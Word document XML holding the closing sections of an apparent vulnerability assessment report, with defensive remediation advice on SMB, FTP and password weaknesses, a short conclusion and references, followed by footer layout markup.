          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235FC377" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="-5" w:right="3387"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc23332"/>
      <w:r>
        <w:t xml:space="preserve">2.4.3 Corrective and Preventive Measures </w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="2BDA6A0C" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="177" w:line="402" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="3387"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Corrective Measures: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75232293" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="288"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enforce strong password policies. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF267E6" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="289"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disable SMBv1 and enforce modern protocols. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7188BE30" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="288"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Patch system vulnerabilities. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F53D43" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="270"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Restrict SMB access through firewalls. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3BF6B3" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="323" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Preventive Measures: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3374162E" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="290"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use intrusion detection/prevention systems (IDS/IPS). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0783C4CC" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="287"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement account lockout policies. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652170AB" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="288"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Conduct regular vulnerability scans. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEC308E" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="222"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Conduct employee cybersecurity training. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560F88A8" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="274" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFA8367" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1AC2F8" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc23333"/>
    </w:p>
    <w:p w14:paraId="48785363" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AA67AFB" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D" w:rsidP="00F5636D"/>
    <w:p w14:paraId="737EAC3D" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRPr="00F5636D" w:rsidRDefault="00F5636D" w:rsidP="00F5636D"/>
    <w:p w14:paraId="218FCF40" w14:textId="2E6DE1B3" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3.0 Conclusion </w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="250E9302" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="157" w:line="362" w:lineRule="auto"/>
        <w:ind w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It was evident from the vulnerability assessment how cybersecurity tools play a vital role in revealing security weaknesses in an organization and capitalizing on them. Our analysis uncovered major weaknesses, including the fact that we had anonymous FTP, unprotected SMB versions such as MS17-010, and inadequate authentication practices. Showing the implications of these vulnerabilities, we demonstrated the real security threats associated with functioning with outdated systems and improper configuration controls. The report emphasizes the indispensable contribution of technical adjustments and best practices in security policy in facilitating continuous upkeep and safeguarding of a secure IT environment, as confirmed by this assessment (Rapid7, 2023). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2A7584" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="188" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EB0EDC" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A5F9D1" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc23334"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">References </w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="146DB659" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="22" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Karen Scarfone, M. S. (2008, September). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Guide to Information Security Testing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF92BA1" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="76" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="777" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>and Assessment.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Retrieved from </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250B9B47" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="180" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="520"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-115.pdf </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4950B9D3" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720" w:right="147" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kovacs, E. (2017, March 27). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>FBI Warns Healthcare Industry of FTP Attacks</w:t>
      </w:r>
      <w:r>
        <w:t>. Retrieved from SECURITYWEEK: https://www.securityweek.com/fbi-warns-healthcare-industry-ftp-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F5B4FC" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="172"/>
        <w:ind w:left="730" w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">attacks/ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452CFF83" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="166"/>
        <w:ind w:left="720" w:right="147" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rapid7. (2023). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>The Metasploit Framework Overview.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Retrieved from https://docs.rapid7.com/metasploit/ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5327DE" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132D6357" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0086222C">
      <w:headerReference w:type="even" r:id="rId46"/>
      <w:headerReference w:type="default" r:id="rId47"/>
      <w:footerReference w:type="even" r:id="rId48"/>
      <w:footerReference w:type="default" r:id="rId49"/>
      <w:headerReference w:type="first" r:id="rId50"/>
      <w:footerReference w:type="first" r:id="rId51"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440" w:right="1280" w:bottom="1511" w:left="1440" w:header="720" w:footer="5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1FE25" w14:textId="77777777" w:rsidR="006B36D6" w:rsidRDefault="006B36D6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1B258E2C" w14:textId="77777777" w:rsidR="006B36D6" w:rsidRDefault="006B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98504" w14:textId="77777777" w:rsidR="0086222C"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6B06C0F" wp14:editId="692E65C5">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>1128713</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>9482138</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5518214" cy="238760"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="22778" name="Group 22778"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                  <wpg:wgp>
                    <wpg:cNvGrpSpPr/>
                    <wpg:grpSpPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5518214" cy="238760"/>
                        <a:chOff x="0" y="0"/>
                        <a:chExt cx="5518214" cy="238760"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wps:wsp>
                      <wps:cNvPr id="22779" name="Shape 22779"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="119063"/>
                          <a:ext cx="5518214" cy="0"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="0" t="0" r="0" b="0"/>
                          <a:pathLst>
                            <a:path w="5518214">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="5518214"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22780" name="Shape 22780"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2479358" y="0"/>
                          <a:ext cx="555625" cy="238760"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="0" t="0" r="0" b="0"/>
                          <a:pathLst>
                            <a:path w="555625" h="238760">
                              <a:moveTo>
                                <a:pt x="39751" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="515874" y="0"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="537845" y="0"/>
                                <a:pt x="555625" y="17818"/>
                                <a:pt x="555625" y="39789"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="555625" y="198971"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="555625" y="220942"/>
                                <a:pt x="537845" y="238760"/>
                                <a:pt x="515874" y="238760"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="39751" y="238760"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="17780" y="238760"/>
                                <a:pt x="0" y="220942"/>
                                <a:pt x="0" y="198971"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="0" y="39789"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="0" y="17818"/>
                                <a:pt x="17780" y="0"/>
                                <a:pt x="3975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81" name="Shape 22781"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2479358" y="0"/>
                          <a:ext cx="39751" cy="238760"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="0" t="0" r="0" b="0"/>
                          <a:pathLst>
                            <a:path w="39751" h="238760">
                              <a:moveTo>
                                <a:pt x="39751" y="238760"/>
                              </a:moveTo>
                              <a:cubicBezTo>
                                <a:pt x="17780" y="238760"/>
                                <a:pt x="0" y="220942"/>
                                <a:pt x="0" y="198971"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="0" y="39789"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="0" y="17818"/>
                                <a:pt x="17780" y="0"/>
                                <a:pt x="39751"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22782" name="Shape 22782"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2995232" y="0"/>
                          <a:ext cx="39751" cy="238760"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="0" t="0" r="0" b="0"/>
                          <a:pathLst>
                            <a:path w="39751" h="238760">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:cubicBezTo>
                                <a:pt x="21971" y="0"/>
                                <a:pt x="39751" y="17818"/>
                                <a:pt x="39751" y="39789"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="39751" y="198971"/>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22783" name="Rectangle 22783"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2716975" y="27780"/>
                          <a:ext cx="108237" cy="247427"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0E60C589" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">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22784" name="Rectangle 22784"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2797747" y="27780"/>
                          <a:ext cx="41147" cy="247427"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="1D4D67EE" w14:textId="77777777" w:rsidR="0086222C"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2778" style="width:434.505pt;height:18.8pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:88.875pt;mso-position-vertical-relative:page;margin-top:746.625pt;" coordsize="55182,2387">
              <v:shape id="Shape 22779" style="position:absolute;width:55182;height:0;left:0;top:1190;" coordsize="5518214,0" path="m0,0l5518214,0">
                <v:stroke weight="1pt" endcap="flat" joinstyle="round" on="true" color="#808080"/>
                <v:fill on="false" color="#000000" opacity="0"/>
              </v:shape>
              <v:shape id="Shape 22780" style="position:absolute;width:5556;height:2387;left:24793;top:0;" coordsize="555625,238760" path="m39751,0l515874,0c537845,0,555625,17818,555625,39789l555625,198971c555625,220942,537845,238760,515874,238760l39751,238760c17780,238760,0,220942,0,198971l0,39789c0,17818,17780,0,39751,0x">
                <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 22781" style="position:absolute;width:397;height:2387;left:24793;top:0;" coordsize="39751,238760" path="m39751,238760c17780,238760,0,220942,0,198971l0,39789c0,17818,17780,0,39751,0">
                <v:stroke weight="2.25pt" endcap="flat" joinstyle="round" on="true" color="#808080"/>
                <v:fill on="false" color="#000000" opacity="0"/>
              </v:shape>
              <v:shape id="Shape 22782" style="position:absolute;width:397;height:2387;left:29952;top:0;" coordsize="39751,238760" path="m0,0c21971,0,39751,17818,39751,39789l39751,198971c39751,220942,21971,238760,0,238760">
                <v:stroke weight="2.25pt" endcap="flat" joinstyle="round" on="true" color="#808080"/>
                <v:fill on="false" color="#000000" opacity="0"/>
              </v:shape>
              <v:rect id="Rectangle 22783" style="position:absolute;width:1082;height:2474;left:27169;top:277;" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p>
                      <w:pPr>
                        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                        <w:jc w:val="left"/>
                      </w:pPr>
                      <w:fldSimple w:instr=" PAGE   \* MERGEFORMAT ">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:cs="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:ascii="Calibri"/>
                          </w:rPr>
                          <w:t xml:space="preserve">1</w:t>
                        </w:r>
                      </w:fldSimple>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:rect>
              <v:rect id="Rectangle 22784" style="position:absolute;width:411;height:2474;left:27977;top:277;"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w10:wrap type="square"/>
            </v:group>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibr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87833C" w14:textId="77777777" w:rsidR="0086222C"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032D2E" wp14:editId="78E905CA">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>1128713</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>9482138</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5518214" cy="238760"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="22740" name="Group 22740"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                  <wpg:wgp>
                    <wpg:cNvGrpSpPr/>
                    <wpg:grpSpPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5518214" cy="238760"/>
                        <a:chOff x="0" y="0"/>
                        <a:chExt cx="5518214" cy="238760"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wps:wsp>
                      <wps:cNvPr id="22741" name="Shape 22741"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="119063"/>
                          <a:ext cx="5518214" cy="0"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="0" t="0" r="0" b="0"/>
                          <a:pathLst>
                            <a:path w="5518214">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="5518214"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22742" name="Shape 22742"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2479358" y="0"/>
                          <a:ext cx="555625" cy="238760"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="0" t="0" r="0" b="0"/>
                          <a:pathLst>
                            <a:path w="555625" h="238760">
                              <a:moveTo>
                                <a:pt x="39751" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="515874" y="0"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="537845" y="0"/>
                                <a:pt x="555625" y="17818"/>
                                <a:pt x="555625" y="39789"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="555625" y="198971"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="555625" y="220942"/>
                                <a:pt x="537845" y="238760"/>
                                <a:pt x="515874" y="238760"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="39751" y="238760"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="17780" y="238760"/>
                                <a:pt x="0" y="220942"/>
                                <a:pt x="0" y="198971"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="0" y="39789"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="0" y="17818"/>
                                <a:pt x="17780" y="0"/>
                                <a:pt x="3975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43" name="Shape 22743"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2479358" y="0"/>
                          <a:ext cx="39751" cy="238760"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="0" t="0" r="0" b="0"/>
                          <a:pathLst>
                            <a:path w="39751" h="238760">
                              <a:moveTo>
                                <a:pt x="39751" y="238760"/>
                              </a:moveTo>
                              <a:cubicBezTo>
                                <a:pt x="17780" y="238760"/>
                                <a:pt x="0" y="220942"/>
                                <a:pt x="0" y="198971"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="0" y="39789"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="0" y="17818"/>
                                <a:pt x="17780" y="0"/>
                                <a:pt x="39751"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22744" name="Shape 22744"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2995232" y="0"/>
                          <a:ext cx="39751" cy="238760"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="0" t="0" r="0" b="0"/>
                          <a:pathLst>
                            <a:path w="39751" h="238760">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:cubicBezTo>
                                <a:pt x="21971" y="0"/>
                                <a:pt x="39751" y="17818"/>
                                <a:pt x="39751" y="39789"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="39751" y="198971"/>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22745" name="Rectangle 22745"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2716975" y="27780"/>
                          <a:ext cx="108237" cy="247427"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="2A784451" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">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22746" name="Rectangle 22746"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2797747" y="27780"/>
                          <a:ext cx="41147" cy="247427"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
